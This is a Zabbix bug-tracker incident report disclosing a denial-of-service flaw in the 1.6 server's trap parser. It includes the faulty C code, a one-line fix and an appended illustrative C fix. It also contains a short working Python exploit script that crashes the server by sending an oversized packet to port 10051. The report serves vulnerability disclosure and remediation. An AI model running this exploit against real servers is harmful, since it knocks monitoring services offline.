Details

    • Type: Incident report
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 1.6
    • Fix Version/s: 1.6
    • Component/s: Proxy (P), Server (S)
    • Labels:
      None
    • Environment:
      Zabbix server v1.6.x

      Description

      While reading Zabbix source code, I found a small error leading to an
      easy-to-exploit denial-of-service vulnerability (tested in version 1.6.1
      as shipped on Ubuntu and 1.6.5 compiled from source).

      In src/zabbix_server/trapper/trapper.c, function process_trap():

      /* Make a copy of "s" truncated to 2047 characters */
      strscpy(copy,s);
      /* Check if there's some ":" in "s" (and not in "copy"!) */
      server=(char *)strtok(s,":");

      [...]

      /* Look for the 1st ":" in "copy" */
      value_string=strchr(copy,':');
      /* If the 1st ":" in "s" is after offset 2047, */
      /* we get a NULL pointer dereference crash */
      value_string=strchr(value_string+1,':');

      The patch is trivial: just use "copy" instead of "s" in your check.

      server=(char *)strtok(copy,":");

      Exploit code:

      8<-----------------------------------------------------------------
      #!/usr/bin/python

      PORT = 10051
      HOST = "192.168.2.89"

      import socket
      import struct

      try:
          socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          socket.settimeout(3)
          socket.connect((HOST, PORT))

          header = 'ZBXD\x01'

          # DoS in ./src/zabbix_server/trapper/trapper.c
          # If first ":" is after 2047 => DoS when reading NULL+1
          data = 'A'*2050 + ':B'

          size = struct.pack('q', len(data))
          socket.send(header + size + data)
          rcvdata = socket.recv(10240)
          print rcvdata
      except:
          print "FAIL"

      socket.close()
      8<-----------------------------------------------------------------
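
Added example, not part of the original report and not Zabbix's own code: a stand-alone C version of the check-the-copy fix, with every strchr() result tested before pointer arithmetic is done on it. The names COPY_MAX, colon_lost_by_truncation and parse_trap_checked, the snprintf-based truncating copy and the "server:key:value" line layout are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define COPY_MAX 2048 /* assumed: 2047 characters + NUL, per the report */

/* 1 when "s" contains ':' but the truncated copy would not (the reported mismatch) */
int colon_lost_by_truncation(const char *s)
{
    const char *p = strchr(s, ':');
    return p != NULL && (size_t)(p - s) >= COPY_MAX - 1;
}

/* Hypothetical parser for an assumed "server:key:value" line.
 * Returns 0 and fills value on success, -1 on malformed input. */
int parse_trap_checked(const char *s, char *value, size_t value_len)
{
    char copy[COPY_MAX];
    char *p;

    snprintf(copy, sizeof(copy), "%s", s);  /* truncating copy */

    /* Validate the buffer that is parsed afterwards, not the original */
    p = strchr(copy, ':');
    if (p == NULL)
        return -1;                           /* unfixed code went on with NULL+1 */
    p = strchr(p + 1, ':');
    if (p == NULL)
        return -1;
    snprintf(value, value_len, "%s", p + 1);
    return 0;
}

int main(void)
{
    char long_line[2100], value[64];

    /* Constructed input: first ':' beyond the 2047-character copy */
    memset(long_line, 'A', 2050);
    strcpy(long_line + 2050, ":B");

    printf("colon lost: %d\n", colon_lost_by_truncation(long_line));
    printf("long line:  %d\n", parse_trap_checked(long_line, value, sizeof(value)));
    printf("good line:  %d\n", parse_trap_checked("host:key:42", value, sizeof(value)));
    return 0;
}
```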

            People

            • Assignee:
              sasha Alexander Vladishev
              Reporter:
              sasha Alexander Vladishev